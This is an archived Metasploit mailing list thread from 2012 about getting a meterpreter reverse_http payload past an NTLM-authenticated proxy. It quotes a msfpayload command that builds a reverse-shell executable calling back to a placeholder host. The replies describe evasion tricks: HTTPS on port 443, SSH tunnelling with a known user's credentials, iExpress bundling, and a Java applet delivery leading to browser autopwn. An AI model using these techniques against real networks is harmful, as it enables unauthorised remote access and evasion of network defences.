Metasploit mailing list archives
Re: meterpreter ntlm proxy bypass
From: "Adrián Puente Z. " <apuente () hackarandas com>
Date: Thu, 12 Apr 2012 15:18:27 -0500
I have some old papers in how to bypass proxys using SSL to emulate a valid https in my blog www.hackarandas.com so far the payload that had worked for me in this scenario was reverse_https with the listener in the 443 port. Other thing that worked for me was using the SET with the Java applet attack to download a simple bat compressed with iexpress that will do a "start iexplore http://x.y.z.a:80/browser-autopwn" Regards, --- Adrián Puente Z. www.hackarandas.com "... ruego a mi orgullo que se acompañe siempre de mi prudencia, y si algún día mi prudencia se echara a volar, que al menos pueda volar junto con mi locura" --Nietzche Huella: F974 46CE 67CD A4EE 7A33 7DDF D249 95CF CABA D400 http://allman.rhon.itam.mx/~apuente/llaves/AdrianPuente-gmail.asc.gz On Apr 11, 2012, at 15:36, Sherif El-Deeb <archeldeeb () gmail com> wrote:
If the logged in user already is a member of the domain, is allowed internet access and the machine is joined to the domain, then reverse_http SHOULD go through the system configured proxy even with NTLM auth, no problem (thanks HD & Mubix!) ... (if you meet that criteria already try setting the LPORT at the mutli/handler to 80 since that might be the only port allowed). however, if the logged in user is not allowed internet connection, or the machine is not member of the domain (i.e. everythime you connect to the internet it pops-up asking for creds) you have to have the following: 1- You have to know the username, password and domain of an allowed-internet user. 2- the Proxy IP and port 3- you have to bundle "meterpreter" with a "NTLM-Auth-proxy-aware" program to tunnel through the connection for you, a tested-and-guaranteed example would be (SSH server listening on 443) + (PLINK with the -L switch) + (meterpreter with LHOST set to 127.0.0.1) + (some command-line kung-fu to add the host SSH key and glue everything together) + iExpress. As far as I know, there's nothing built-in that allows you to specify a username, pass, domain and the proxy:port to meterpreter :) I think I'll write a blog post about this someday :) but please beware that you have to know lots of things in advance to make this work. Sherif Eldeeb On Wed, Apr 11, 2012 at 10:49 PM, audio audience <audience099 () gmail com> wrote:Hello Everyone, I want to bypass ntlm supported proxy bypass with meterpreter. I tested it in my Labs; all outgoing traffics blocked by firewall for client. If client want to access internet, it's need to set windows username and password to ntlm auth. proxy. I created meterpreter payload this following options; # msfpayload windows/meterpreter/reverse_http LHOST=x.y.z.t LPORT=8080 AutoRunScript='migrate2 iexplore.exe' X > /var/www/8.exe For listening mode; msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_http): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST x.y.z.t yes The local listener hostname LPORT 8080 yes The local listener port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started HTTP reverse handler on http://x.y.z.t:8080/ [*] Starting the payload handler... And then i ran 8.exe to victim computer but proxy is blocked meterpreter http connection, because meterpreter didn't complate ntlm auth. Squid Log; 1334171617.857 0 a.b.c.d TCP_DENIED/407 1744 GET http://x.y.z.t:8080/l2eY - NONE/- text/html How i can bypass ntlm auth. with meterpreter payload. Thanks for supports _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- meterpreter ntlm proxy bypass audio audience (Apr 11)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 11)
- Re: meterpreter ntlm proxy bypass Adrián Puente Z. (Apr 12)
- Re: meterpreter ntlm proxy bypass audio audience (Apr 13)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 13)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 11)